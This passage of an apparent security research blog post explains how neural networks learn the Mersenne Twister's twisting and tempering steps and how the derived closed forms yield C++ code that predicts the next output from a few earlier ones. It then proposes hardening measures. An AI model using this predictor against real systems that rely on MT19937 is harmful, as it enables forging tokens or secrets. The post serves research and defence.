2. How does MT19937 PRNG work?

MT can be considered as a twisted form of the generalized Linear-feedback shift register (LFSR). The idea of LFSR is to use a linear function, such as XOR, with the old register value to get the register’s new value. In MT, the internal state is saved in the form of a sequence of 32-bit words. The size of the internal state is different based on the MT variant, which in the case of  MT19937 is 624. The pseudocode of MT is listed below as shared in Wikipedia.

 // Create a length n array to store the state of the generator
 int[0..n-1] MT
 int index := n+1
 const int lower_mask = (1 << r) - 1 // That is, the binary number of r 1's
 const int upper_mask = lowest w bits of (not lower_mask)
 
 // Initialize the generator from a seed
 function seed_mt(int seed) {
     index := n
     MT[0] := seed
     for i from 1 to (n - 1) { // loop over each element
         MT[i] := lowest w bits of (f * (MT[i-1] xor (MT[i-1] >> (w-2))) + i)
     }
 }
 
 // Extract a tempered value based on MT[index]
 // calling twist() every n numbers
 function extract_number() {
     if index >= n {
         if index > n {
           error "Generator was never seeded"
           // Alternatively, seed with constant value; 5489 is used in reference C code[53]
         }
         twist()
     }
 
     int y := MT[index]
     y := y xor ((y >> u) and d)
     y := y xor ((y << s) and b)
     y := y xor ((y << t) and c)
     y := y xor (y >> l)
 
     index := index + 1
     return lowest w bits of (y)
 }
 
 // Generate the next n values from the series x_i 
 function twist() {
     for i from 0 to (n-1) {
         int x := (MT[i] and upper_mask)
                   + (MT[(i+1) mod n] and lower_mask)
         int xA := x >> 1
         if (x mod 2) != 0 { // lowest bit of x is 1
             xA := xA xor a
         }
         MT[i] := MT[(i + m) mod n] xor xA
     }
     index := 0
 } 

The first function is seed_mt, used to initialize the 624 state values using the initial seed and the linear XOR function. This function is straightforward, but we will not get in-depth of its implementation as it is irrelevant to our goal. The main two functions we have are extract_number and twist. extract_number function is called every time we want to generate a new random value.  It starts by checking if the state is not initialized; it either initializes it by calling seed_mt with a constant seed or returns an error. Then the first step is to call the twist function to twist the internal state, as we will describe later. This twist is also called every 624 calls to the extract_number function again. After that, the code uses the number at the current index (which starts with 0 up to 623) to temper one word from the state at that index using some linear XOR, SHIFT, and AND operations. At the end of the function, we increment the index and return the tempered state value. 

The twist function changes the internal states to a new state at the beginning and after every 624 numbers generated. As we can see from the code, the function uses the values at indices i, i+1, and i+m to generate the new value at index i using some XOR, SHIFT, and AND operations similar to the tempering function above.

Please note that w, n, m, r, a, u, d, s, b, t, c, l, and f are predefined constants for the algorithm that may change from one version to another. The values of these constants for MT19937 are as follows:

  • (wnmr) = (32, 624, 397, 31)
  • a = 9908B0DF16
  • (ud) = (11, FFFFFFFF16)
  • (sb) = (7, 9D2C568016)
  • (tc) = (15, EFC6000016)
  • l = 18
  • f = 1812433253

3. Using Neural Networks to model the MT19937 PRNG

As we saw in the previous section, MT can be split into two main steps, twisting and tempering steps. The twisting step only happens once every n calls to the PRNG (where n equals 624 in MT19937) to twist the old state into a new state. The tempering step happens with each number generated to convert one of the 624 states to a random number. Hence, we are planning to use two NN models to learn each step separately. Then we will use the two models to reverse the whole PRNG by using the reverse tempering model to get from a generated number to its internal state then use the twisting model to produce the new state. Then, we can temper the generated state to get to the expected new PRNG number.

3.1 Using NN for State Twisting

After checking the code listing for the twisting function line 46, we can see that the new state at the position, i, depends on the variable xA and the value of the old state value at position (i + m), where m equals 397 in MT19937. Also, the value of xA depends on the value of the variable x and some constant a. And the value of the variable x depends on the old state’s values at positions i and i + 1.

Hence, we can deduce that, and without getting into the details, each new twisted state depends on three old states as follows:

MT[i] = f(MT[i - 624], MT[i - 624 + 1], MT[i - 624 + m])

    = f(MT[i - 624], MT[i - 623], MT[i - 227])     ( using m = 397 as in MT19937 )

We want to train an NN model to learn the function f hence effectively replicating the twisting step. To accomplish this, we have created a different function that generates the internal state (without tempering) instead of the random number. This allows us to correlate the internal states with each other, as described in the above formula.

3.1.1 Data Preparation

We have generated a sequence of 5,000,000 32bits words of states. We then formatted these states into three 32bits inputs and one 32bits output. This would create around a five million records dataset (5 million – 624). Then we split the data into training and testing sets, with only 100,000 records for the test set, and the rest of the data is used for training.

3.1.2 Neural Network Model Design

Our proposed model would have 96 inputs in the input layer to represent the old three states at the specific locations described in the previous equation, 32-bit each, and 32 outputs in the output layer to represent the new 32-bit state. The main hyperparameters that we need to decide are the number of neurons/nodes and hidden layers. We have tested different models’ structures with different hidden layers and a different number of neurons in each layer. Then we used Keras’ BayesianOptimization to select the optimal number of hidden layers/neurons along with other optimization parameters (such as learning rate, … etc.). We used a small subset of the training set as the training set for this optimization. We have got multiple promising model structures. Then, we used the smallest model structure that had the most promising result.  

3.1.3 Optimizing the NN Inputs

After training multiple models, we noticed that the weights that connect the first 31-bit of the  96 input bits to the first hidden layer nodes are almost always close to zero. This implies that those bits have no effects on the output bits, and hence we can ignore them in our training. To check our observation with the MT implementation, we noticed that the state at position i is bitwise ANDed with a bitmask called upper_mask which, when we checked, has a value of 1 in the MSB and 0 for the rest when using r with the value of 31 as stated in MT19937. So, we only need the MSB of the state at position i. Hence, we can train our NN with only 65bits inputs instead of 96.

Hence, our neural network structure ended up with the following model structure (the input layer is ignored):

_________________________________________________________________
Layer (type)                 Output Shape              Param #   
=================================================================
dense (Dense)                (None, 96)                6336      
_________________________________________________________________
dense_1 (Dense)              (None, 32)                3104      
=================================================================
Total params: 9,440
Trainable params: 9,440
Non-trainable params: 0
_________________________________________________________________

As we can see, the number of the parameters (weights and biases) of the hidden layer is only 6,336 (65×96 weights + 96 biases), and the number of the parameters of the output layer is 3,104 (96×32 weights + 32 biases), which gets to a total of 9,440 parameters to train. The hidden layer activation function is relu, while the output layer activation function is sigmoid as we expect it to be a binary output. Here is the summary of the model parameters:

Twisting Model
Model Type Dense Network
#Layers 2
#Neurons 128 Dense
#Trainable Parameters 9,440
Activation Functions Hidden Layer: relu
Output Layer: sigmoid
Loss Function binary_crossentropy

3.1.4 Model Results

After a few hours and manual tweaking of the model architecture, we have trained a model that has achieved 100% bitwise accuracy for both the training and testing sets. To be more confident about what we have achieved, we have generated a new sample of 1000,000 states generated using a different seed than the one used to generate the previous data. We got the same result of 100% bitwise accuracy when we tested with the newly generated data.

This means that the model has learned the exact formula that relates each state to the three previous states. Hence if we got access to the three internal states at those specific locations, we could predict the next state. But, usually, we can get access only to the old random numbers, not the internal states. So, we need a different model that can reverse the generated tempered number to its equivalent internal state. Then we can use this model to create the new state. Then, we can use the normal tempering step to get to the new output. But before we get to that, let’s do model deep dive.

3.1.5 Model Deep Dive

This section will deep dive into the model to understand more what it has learned from the State relations data and if it matches our expectations. 

3.1.5.1 Model First Layer Connections

As discussed in Section 2, each state depends on three previous states, and we also showed that we only need the MSB (most significant bit) of the first state; hence we had 65bits as input. Now, we would like to examine whether all 65 input bits have the same effects on the 64 output bits? In other words, do all the input bits have more or less the same importance for the outputs? We can use the NN weights that connect the 65 inputs in the input layer to the hidden layer, the 96 hidden nodes, of our trained model to determine the importance of each bit. The following figure shows the weights connecting each input, in x-axes, to the 96 hidden nodes in the hidden layer:

We can notice that the second bit, which corresponds to the second state LSB, is connected to many hidden layer nodes, implying that it affects multiple bits in the output. Comparing this observation against the code listed in Section 2 corresponds to the if-condition that checks the LSB bit, and based on its value, it may XOR the new state with a constant value that dramatically affects the new state.

We can also notice that the 33rd input, marked on the figure, is almost not connected to any hidden layer nodes as all the weights are close to zero. This can also be mapped to the code in line 12, where we bit masked the second state to  0x7FFFFFFF in MT19937, which basically neglects the MSB altogether.

3.1.5.2 The Logic Closed-Form from the State Twisting Model Output

After creating a model that can replicate the twist operation of the states, we would like to see if we can possibly get to the logic closed form using the trained model. Of course, we can derive the closed-form by building all the 65bit input variations and testing each input combination’s outputs (2^65) and derive the closed-form. But this approach is tedious and requires lots of evaluations. Instead, we can test the effect of each input on each output separately. This can be done by using the training set and sticking each input bit individually, one time at 0 and one time at 1, and see which bits in the output are affected. This will show how which bits in the inputs affecting each bit in the output. For example, when we checked the first input, which corresponds to MSB of the first state, we found it only affects bit 30 in the output. The following table shows the effect of each input bit on each output bit:

Input Bits Output Bits
0   [30]
1   [0, 1, 2, 3, 4, 6, 7, 12, 13, 15, 19, 24, 27, 28, 31]
2   [0]
3   [1]
4   [2]
5   [3]
6   [4]
7   [5]
8   [6]
9   [7]
10   [8]
11   [9]
12   [10]
13   [11]
14   [12]
15   [13]
16   [14]
17   [15]
18   [16]
19   [17]
20   [18]
21   [19]
22   [20]
23   [21]
24   [22]
25   [23]
26   [24]
27   [25]
28   [26]
29   [27]
30   [28]
31   [29]
32   []
33   [0]
34   [1]
35   [2]
36   [3]
37   [4]
38   [5]
39   [6]
40   [7]
41   [8]
42   [9]
43   [10]
44   [11]
45   [12]
46   [13]
47   [14]
48   [15]
49   [16]
50   [17]
51   [18]
52   [19]
53   [20]
54   [21]
55   [22]
56   [23]
57   [24]
58   [25]
59   [26]
60   [27]
61   [28]
62   [29]
63   [30]
64   [31]

We can see that inputs 33 to 64, which corresponds to the last state, are affecting bits 0 to 31 in the output. We can also see that inputs 2 to 31, which corresponds to the second state from bit 1 to bit 30 (ignoring the LSB and MSB), affect bits 0 to 29 in the output. And as we know, we are using the XOR logic function in the state evaluation. We can formalize the closed-form as follows (ignoring bit 0 and bit 1 in the input for now):

          MT[i] = MT[i - 227] ^ ((MT[i - 623] & 0x7FFFFFFF) >> 1)

This formula is so close to the result. We need to add the effect of input bits 0 and 1. For input number 0, which corresponds to the first state MSB, it is affecting bit 30. Hence we can update the above closed-form to be:

          MT[i] = MT[i - 227] ^ ((MT[i - 623] & 0x7FFFFFFF) >> 1) ^ ((MT[i - 624] & 0x80000000) << 1)

Lastly, the first bit in the input, which corresponds to the second state LSB, affects 15 bits in the output. As we are using it in an XOR function, if this bit is 0, it does not affect the output, but if it has a value of one, it will affect all the listed 15bits (by XORing them). If we formulate these 15 bits into a hexadecimal value, we will get 0x9908B0DF (which corresponds to the constant a in MT19937). Then we can include this to the closed-form as follows:

          MT[i] = MT[i - 227] ^ ((MT[i - 623] & 0x7FFFFFFF) >> 1) ^ ((MT[i - 624] & 0x80000000) << 1) ^ ((MT[i - 623] & 1) * 0x9908B0DF)

So, if the LSB of the second state is 0, the result of the ANDing will be 0, and hence the multiplication will result in 0. But if the LSB of the second state is 1, the result of the ANDing will be 1, and hence the multiplication will result in 0x9908B0DF. This is equivalent to the if-condition in the code listing. We can rewrite the above equation to use the circular buffer as follows:

          MT[i] = MT[(i + 397) % 624] ^ ((MT[(i + 1) % 624] & 0x7FFFFFFF) >> 1) ^ ((MT[i] & 0x80000000) << 1) ^ ((MT[(i + 1) % 624] & 1) * 0x9908B0DF)

Now let’s check how to reverse the tempered numbers to the internal states using an ML model.

3.2 Using NN for State Tempering

We plan to train a neural network model for this phase to reverse the state tempering introduced in the code listing from line 10 to line 20. As we can see, a series of XORing and shifting is done to the state at the current index to generate the random number. So, we have updated the code to generate the state before and after the state tempering to be used as inputs and outputs for the Neural network.

3.2.1 Data Preparation

We have generated a sequence of 5,000,000 32 bit words of states and their tempered values. Then we used the tempered states as inputs and the original states as outputs. This would create a 5 million records dataset. Then we split the data into training and testing sets, with only 100,000 records for the test set, and the rest of the data is used for training.

3.2.2 Neural Network Model Design

Our proposed model would have 32 inputs in the input layer to represent the tempered state values and 32 outputs in the output layer to represent the original 32-bit state. The main hyperparameter that we need to decide is the number of neurons/nodes and hidden layers. We have tested different models’ structures with a different number of hidden layers and neurons in each layer, similar to what we did in the NN model before. We also used the smallest model structure that has the most promising result. Hence, our neural network structure ended up with the following model structure (the input layer is ignored):

_________________________________________________________________
Layer (type)                 Output Shape              Param #   
=================================================================
dense (Dense)                (None, 640)               21120     
_________________________________________________________________
dense_1 (Dense)              (None, 32)                20512     
=================================================================
Total params: 41,632
Trainable params: 41,632
Non-trainable params: 0
_________________________________________________________________

As we can see, the number of the parameters (weights and biases) of the hidden layer is only 21,120 (32×640 weights + 640 biases), and the number of the parameters of the output layer is 20,512 (640×32 weights + 32 biases), which gets to a total of 41,632 parameters to train. We can notice that this model is much bigger than the model for twisting as the operations done in tempering is much more complex than the operations done there. Similarly, the hidden layer activation function is relu, while the output layer activation function is sigmoid as we expect it to be a binary output. Here is the summary of the model parameters:

Tempering Model
Model Type Dense Network
#Layers 2
#Neurons 672 Dense
#Trainable Parameters 41,632
Activation Functions Hidden Layer: relu
Output Layer: sigmoid
Loss Function binary_crossentropy

3.2.3 Model Results

After manual tweaking of the model architecture, we have trained a model that has achieved 100% bitwise accuracy for both the training and testing sets. To be more confident about what we have achieved, we have generated a new sample of 1000,000 states and tempered states using a different seed than those used to generate the previous data. We got the same result of 100% bitwise accuracy when we tested with the newly generated data.

This means that the model has learned the exact inverse formula that relates each tempered state to its original state. Hence, we can use this model to reverse the generated numbers corresponding to the internal states we need for the first model. Then we can use the twisting model to get the new state. Then, we can use the normal tempering step to get to the new output. But before we get to that, let’s do a model deep dive.

3.2.4 Model Deep Dive

This section will deep dive into the model to understand more what it has learned from the State relations data and if it matches our expectations. 

3.2.4.1 Model Layers Connections

After training the model, we wanted to test if any bits are not used or are less connected. The following figure shows the weights connecting each input, in x-axes, to the 640 hidden nodes in the hidden layer (each point represents a hidden node weight):

As we can see, each input bit is connected to many hidden nodes, which implies that each bit in the input has more or less weight like others. We also plot in the following figure the connections between the hidden layer and the output layer:

The same observation can be taken from the previous figure, except that maybe bits 29 and 30 are less connected than others, but they are still well connected to many hidden nodes.

3.2.4.2 The Logic Closed-Form from the State Tempering Model Output

In the same way, we did with the first model, we can derive a closed-form logic expression that reverses the tempering using the model output. But, instead of doing so, we can derive a closed-form logic expression that uses the generated numbers at the positions mentioned in the first part to reverse them to the internal states, generate the new states and then generate the new number in one step. So, we plan to connect three models of the reverse tempering models to one model that generates the new state and then temper the output to get to the newly generated number as shown in the following figure:

Now we have 3 x 32 bits inputs and 32 bits output. Using the same approach described before, we can test the effect of each input on each output separately. This will show how each bit in the input bits affecting each bit in the output bits. The following table shows the input-output relations:

Input Index Input Bits Output Bits
0 0   []
0 1   []
0 2   [1, 8, 12, 19, 26, 30]
0 3   []
0 4   []
0 5   []
0 6   []
0 7   []
0 8   []
0 9   [1, 8, 12, 19, 26, 30]
0 10   []
0 11   []
0 12   []
0 13   []
0 14   []
0 15   []
0 16   [1, 8, 12, 19, 26, 30]
0 17   [1, 8, 12, 19, 26, 30]
0 18   []
0 19   []
0 20   [1, 8, 12, 19, 26, 30]
0 21   []
0 22   []
0 23   []
0 24   [1, 8, 12, 19, 26, 30]
0 25   []
0 26   []
0 27   [1, 8, 12, 19, 26, 30]
0 28   []
0 29   []
0 30   []
0 31   [1, 8, 12, 19, 26, 30]
1 0   [3, 5, 7, 9, 11, 14, 15, 16, 17, 18, 23, 25, 26, 27, 28, 29, 30, 31]
1 1   [0, 4, 7, 22]
1 2   [13, 16, 19, 26, 31]
1 3   [2, 6, 24]
1 4   [0, 3, 7, 10, 18, 25]
1 5   [4, 7, 8, 11, 25, 26]
1 6   [5, 9, 12, 27]
1 7   [5, 7, 9, 10, 11, 14, 15, 16, 17, 18, 21, 23, 25, 26, 27, 29, 30, 31]
1 8   [7, 11, 14, 29]
1 9   [1, 19, 26]
1 10   [9, 13, 31]
1 11   [2, 3, 5, 7, 9, 10, 11, 13, 14, 15, 16, 18, 20, 23, 24, 25, 26, 27, 28, 29, 30, 31]
1 12   [7, 11, 25]
1 13   [1, 9, 12, 19, 27]
1 14   [2, 10, 13, 20, 28]
1 15   [3, 14, 21]
1 16   [1, 8, 12, 15, 19, 26, 30]
1 17   [1, 5, 8, 13, 16, 19, 23, 26, 31]
1 18   [3, 5, 6, 7, 9, 11, 14, 15, 16, 18, 23, 24, 25, 26, 27, 28, 29, 30, 31]
1 19   [4, 18, 22, 25]
1 20   [1, 13, 16, 26, 31]
1 21   [6, 20, 24]
1 22   [0, 2, 3, 5, 6, 9, 11, 13, 14, 15, 16, 17, 20, 21, 23, 26, 27, 29, 30, 31]
1 23   [7, 8, 11, 22, 25, 26]
1 24   [1, 8, 9, 12, 19, 23, 26, 27]
1 25   [5, 6, 7, 9, 10, 11, 13, 14, 15, 16, 17, 18, 21, 23, 24, 25, 26, 27, 29, 30]
1 26   [11, 14, 25, 29]
1 27   [1, 8, 19]
1 28   [13, 27, 31]
1 29   [2, 3, 5, 7, 9, 11, 13, 14, 15, 16, 18, 20, 23, 24, 25, 26, 27, 29, 30, 31]
1 30   [7, 25, 29]
1 31   [8, 9, 12, 26, 27]
2 0   [0]
2 1   [1]
2 2   [2]
2 3   [3]
2 4   [4]
2 5   [5]
2 6   [6]
2 7   [7]
2 8   [8]
2 9   [9]
2 10   [10]
2 11   [11]
2 12   [12]
2 13   [13]
2 14   [14]
2 15   [15]
2 16   [16]
2 17   [17]
2 18   [18]
2 19   [19]
2 20   [20]
2 21   [21]
2 22   [22]
2 23   [23]
2 24   [24]
2 25   [25]
2 26   [26]
2 27   [27]
2 28   [28]
2 29   [29]
2 30   [30]
2 31   [31]

As we can see, each bit in the third input affects the same bit in order in the output. Also, we can notice that only 8 bits in the first input affect the same 6 bits in the output. But for the second input, each bit is affecting several bits. Although we can write a closed-form logic expression for this, we would write a code instead.

The following code implements a C++ function that can use three generated numbers (at specific locations) to generate the next number:

uint inp_out_xor_bitsY[32] = {
    0xfe87caa8,
    0x400091,
    0x84092000,
    0x1000044,
    0x2040489,
    0x6000990,
    0x8001220,
    0xeea7cea0,
    0x20004880,
    0x4080002,
    0x80002200,
    0xff95eeac,
    0x2000880,
    0x8081202,
    0x10102404,
    0x204008,
    0x44089102,
    0x84892122,
    0xff85cae8,
    0x2440010,
    0x84012002,
    0x1100040,
    0xecb3ea6d,
    0x6400980,
    0xc881302,
    0x6fa7eee0,
    0x22004800,
    0x80102,
    0x88002000,
    0xef95eaac,
    0x22000080,
    0xc001300
};

uint gen_new_number(uint MT_624, uint MT_623, uint MT_227) {
    uint r = 0;
    uint i = 0;
    do {
        r ^= (MT_623 & 1) * inp_out_xor_bitsY[i++];
    }
    while (MT_623 >>= 1);
    
    MT_624 &= 0x89130204;
    MT_624 ^= MT_624 >> 16;
    MT_624 ^= MT_624 >> 8;
    MT_624 ^= MT_624 >> 4;
    MT_624 ^= MT_624 >> 2;
    MT_624 ^= MT_624 >> 1;
    r ^= (MT_624 & 1) * 0x44081102;
    
    r ^= MT_227;
    return r;
}

We have tested this code by using the standard MT library in C to generate the sequence of the random numbers and match the generated numbers from the function with the next generated number from the library. The output was 100% matching for several millions of generated numbers with different seeds.

3.2.4.3 Further Improvement

We have seen in the previous section that we can use three generated numbers to generate the new number in the sequence. But we noticed that we only need 8 bits from the first number, which we XOR, and if the result of the XORing of them is one, we XOR the result with a constant, 0x44081102. Based on this observation, we can instead ignore the first number altogether and generate two possible output values, with or without XORing the result with 0x44081102. Here is the code segment for the new function.

#include<tuple>
  
using namespace std;

uint inp_out_xor_bitsY[32] = {
    0xfe87caa8,
    0x400091,
    0x84092000,
    0x1000044,
    0x2040489,
    0x6000990,
    0x8001220,
    0xeea7cea0,
    0x20004880,
    0x4080002,
    0x80002200,
    0xff95eeac,
    0x2000880,
    0x8081202,
    0x10102404,
    0x204008,
    0x44089102,
    0x84892122,
    0xff85cae8,
    0x2440010,
    0x84012002,
    0x1100040,
    0xecb3ea6d,
    0x6400980,
    0xc881302,
    0x6fa7eee0,
    0x22004800,
    0x80102,
    0x88002000,
    0xef95eaac,
    0x22000080,
    0xc001300
};

tuple <uint, uint> gen_new_number(uint MT_623, uint MT_227) {
    uint r = 0;
    uint i = 0;
    do {
        r ^= (MT_623 & 1) * inp_out_xor_bitsY[i++];
    }
    while (MT_623 >>= 1);
    
    r ^= MT_227;
    return make_tuple(r, r^0x44081102);
}

4. Improving MT algorithm

We have shown in the previous sections how to use ML to crack the MT algorithm and use only two or three numbers to predict the following number in the sequence. In this section, we will discuss two issues with the MT algorithm and how to improve them. Studying those issues can be particularly useful when MT is used as a part of cryptographically-secure PRNG, like in CryptMT. CryptMT uses Mersenne Twister internally, and it was developed by Matsumoto, Nishimura, Mariko Hagita, and Mutsuo Saito [2].

4.1 Normalizing the Runtime

As we described in Section 2, MT consist of two steps, twisting and tempering. Although the tempering step is applied on each step, the twisting step is only used when we exhaust all the states, and we need to twist the state array to create a new internal state. That is OK, algorithmically, but from the cybersecurity point of view, this is problematic. It makes the algorithm vulnerable to a different type of attack, namely a timing side-channel attack. In this attack, the attacker can determine when the state is being twisted by monitoring the runtime of each generated number, and when it is much longer, the start of the new state can be guessed. The following figure shows an example of the runtime for the first 10,000 generated numbers using MT:

We can clearly see that every 624 iterations, the runtime of the MT algorithm increases significantly due to the state-twisting evaluation. Hence, the attacker can easily determine the start of the state twisting by setting a threshold of 0.4 ms of the generated numbers. Fortunately, this issue can be resolved by updating the internal state every time we generate a new number using the progressive formula we have created earlier. Using this approach, we have updated the code for MT and measured the runtime again, and here is the result:

We can see that the runtime of the algorithm is now normalized across all iterations. Of course, we checked the output of both MT implementations, and they got the exact sequences. Also, when we evaluated the mean of the runtime of both MT implementations over millions of numbers generated, the new approach is a little more efficient but has a much smaller standard deviation.

4.2 Changing the Internal State as a Whole

We showed in the previous section that the MT twist step is equivalent to changing the internal state progressively. This is the main reason we were able to build a machine learning that can correlate a generated output from MT to three previous outputs. In this section, we suggest changing the algorithm slightly to overcome this weakness. The idea is to apply the twisting step on the old state at once and generate the new state from it. This can be achieved by doing the twist step in a new state array and swap the new state with the old one after twisting all the states. This will make the state prediction more complex as different states will use different distances for evaluating the new state. For example, all the new states from 0 to 226 will use the old states from 397 to 623, which are 397 apart. And all the new states from 227 to 623 will be using the value of the old states from 0 to 396, which are 227 apart. This slight change will generate a more resilient PRNG for the above-suggested attack, as any generated output can be either 227  or 397 away from the output it depends on as we don’t know the position of the generated number (whether it is in the first 227 numbers from the state or in the last 397 ones). Although this will generate a different sequence, the new state’s prediction from the old ones will be harder. Of course, this suggestion needs to be reviewed more deeply to check the other properties of the outcome PRNG, such as periodicity.

5. Conclusion

In this series of posts, we have shared the methodology of cracking two of the well-known (non-cryptographic) Pseudo-Random Number Generators, namely xorshift128 and Mersenne Twister. In the first post, we showed how we could use a simple machine learning model to learn the internal pattern in the sequence of the generated numbers. In this post, we extended this work by applying ML techniques to a more complex PRNG. We also showed how to split the problem into two simpler problems, and we trained two different NN models to tackle each problem separately. Then we used the two models together to predict the next sequence number in the sequence using three generated numbers. Also, we have shown how to deep dive into the models and understand how they work internally and how to use them to create a closed-form code that can break the Mersenne Twister (MT) PRNG. At last, we shared two possible techniques to improve the MT algorithm security-wise as a means of thinking through the algorithmic improvements that can be made based on patterns identified by deep learning (while still recognizing that these changes do not themselves constitute sufficient security improvements for MT to be itself used where cryptographic randomness is required).

The python code for training and testing the model outlined in this post is shared in this repo in a form of a Jupyter notebook. Please note that this code is based on top of an old version of the code shared in the post [3] and the changes that are done in part 1 of this post.

Acknowledgment

I would like to thank my colleagues in NCC Group for their help and support and for giving valuable feedback the especially in the crypto/cybersecurity parts. Here are a few names that I would like to thank explicitly: Ollie Whitehouse, Jennifer Fernick, Chris Anley, Thomas Pornin, Eric Schorn, and Eli Sohl.

References

[1] Mike Shema, Chapter 7 – Leveraging Platform Weaknesses, Hacking Web Apps, Syngress, 2012, Pages 209-238, ISBN 9781597499514, https://doi.org/10.1016/B978-1-59-749951-4.00007-2.

[2] Matsumoto, Makoto; Nishimura, Takuji; Hagita, Mariko; Saito, Mutsuo (2005). “Cryptographic Mersenne Twister and Fubuki Stream/Block Cipher” (PDF).

[3] Everyone Talks About Insecure Randomness, But Nobody Does Anything About It

❌